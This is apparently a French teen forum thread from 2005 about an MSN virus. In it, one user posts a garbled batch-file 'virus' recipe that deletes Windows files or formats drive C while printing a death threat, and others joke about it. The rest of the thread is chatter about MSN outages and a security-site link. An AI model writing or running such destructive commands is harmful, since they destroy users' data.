clr tu crées un fichier . bat ac le bloc notes et tu tapes tes commandes trop simple quoi
jlai eu et jvi1 2 leffacer
Pif le chien
@echo offecho tu vas mourir ^^del C:windows.exe*ouformat C:pauseecho t´es mort :Dcls
a wis je connais sa cé du basic lol lol
voila Crashit vient de donner la recette d´un virus à tous les lamerz et newbiees du forum planquez vos boites mails
crashit lol
lol, ne vous amusez pas a faire ça j´expliquez juste, je ne veux pas faire de vous des gros lamerz
moi je les ressus par mon cousin mais j´ai pas acepter
oki crashit
msn ne marche plus ché moi si on réinstalle msn c bon ? ?
non
Moi MSN marche depuis midi J´ai bugué une fois donc j´ai rebooter et sa marchais toujours
Ben wé
==> 100° message de ce topic < ==
bon jv:
et @ demain
fo faire koi ? ?
www.secuser.com ==> gratuit
bip-bip Posté le 07 mars 2005 à 21:58:09fo faire koi ? ?
tu attend que ca remarche